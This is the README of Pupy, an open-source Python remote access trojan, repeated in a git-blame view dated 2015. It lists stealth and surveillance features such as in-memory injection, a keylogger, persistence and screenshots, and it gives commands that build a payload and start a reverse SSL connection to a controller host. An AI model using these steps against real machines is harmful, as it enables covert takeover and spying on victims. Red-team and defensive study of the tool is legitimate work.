pupy/README.md

# Pupy
Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.

## Features :
- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
- Pupy can reflectively migrate into other processes
- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented). 
- modules are quite simple to write and pupy is easily extensible.
- Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
  - we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
- communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
- all the non interactive modules can be dispatched on multiple hosts in one command
- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
- modules can be executed as background jobs
- commands and scripts running on remote hosts are interruptible
- auto-completion and nice colored output :-)
- commands aliases can be defined in the config

## Implemented Modules :
- migrate (windows only) 
  - inter process architecture injection also works (x86->x64 and x64->x86)
- keylogger (windows only)
- persistence (windows only)
- screenshot (windows only)
- command execution
- download
- upload
- socks5 proxy
- interactive shell (cmd.exe, /bin/sh, ...)
- interactive python shell

##Quick start
In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1  
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5) 
### generate/run a payload
#### for Windows
```bash
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
```
#### for Linux
```bash
pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```

#### for MAC OS X
```bash
easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```

### having fun
1. eventually edit pupy.conf to change the bind address / port
2. start the pupy server :
```bash
./pupysh.py
```
3. type "clients" to display connected clients

### Some screenshots
#####list connected clients
![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")
#####help
![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")
#####execute python code on all clients
![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")
#####execute a command on all clients, exception is retrieved in case the command does not exists
![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")
#####use a filter to send a module only on selected clients
![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")
#####migrate into another process
![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")

## Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)

## Contact
Don't hesitate to send me your feedback or any issue you may find  
mail: contact@n1nj4.eu  
[Follow me on twitter](https://twitter.com/n1nj4sec)
Update README.md 2015-09-21 20:24:27 +00:00			`# Pupy`
readme added 2015-09-21 20:15:05 +00:00			`Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.`

			`## Features :`
			`- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)`
			`- Pupy can reflectively migrate into other processes`
			`- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).`
			`- modules are quite simple to write and pupy is easily extensible.`
			`- Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client`
			`- we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !`
			`- communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future`
			`- all the non interactive modules can be dispatched on multiple hosts in one command`
			`- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)`
			`- modules can be executed as background jobs`
			`- commands and scripts running on remote hosts are interruptible`
			`- auto-completion and nice colored output :-)`
			`- commands aliases can be defined in the config`

			`## Implemented Modules :`
			`- migrate (windows only)`
			`- inter process architecture injection also works (x86->x64 and x64->x86)`
			`- keylogger (windows only)`
			`- persistence (windows only)`
			`- screenshot (windows only)`
			`- command execution`
			`- download`
			`- upload`
			`- socks5 proxy`
			`- interactive shell (cmd.exe, /bin/sh, ...)`
			`- interactive python shell`

			`##Quick start`
Update README.md 2015-09-21 20:24:27 +00:00			`In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1`
readme added 2015-09-21 20:15:05 +00:00			`The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)`
Update README.md 2015-09-21 20:24:27 +00:00			`### generate/run a payload`
readme added 2015-09-21 20:15:05 +00:00			`#### for Windows`
			```bash
			`./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe`
			```
			`#### for Linux`
			```bash
			`pip install rpyc #(or manually copy it if you are not admin)`
			`python reverse_ssl.py 192.168.0.1:443`
			```

			`#### for MAC OS X`
			```bash
			`easy_install rpyc #(or manually copy it if you are not admin)`
			`python reverse_ssl.py 192.168.0.1:443`
			```

Update README.md 2015-09-21 20:24:27 +00:00			`### having fun`
readme added 2015-09-21 20:15:05 +00:00			`1. eventually edit pupy.conf to change the bind address / port`
Update README.md 2015-09-21 20:24:27 +00:00			`2. start the pupy server :`
readme added 2015-09-21 20:15:05 +00:00			```bash
			`./pupysh.py`
			```
			`3. type "clients" to display connected clients`
updated README 2015-09-21 20:50:01 +00:00
			`### Some screenshots`
			`#####list connected clients`
			`![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")`
			`#####help`
			`![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")`
			`#####execute python code on all clients`
			`![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")`
			`#####execute a command on all clients, exception is retrieved in case the command does not exists`
			`![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")`
			`#####use a filter to send a module only on selected clients`
			`![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")`
			`#####migrate into another process`
			`![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")`

			`## Dependencies`
			`rpyc (https://github.com/tomerfiliba/rpyc)`

			`## Contact`
			`Don't hesitate to send me your feedback or any issue you may find`
			`mail: contact@n1nj4.eu`
			`[Follow me on twitter](https://twitter.com/n1nj4sec)`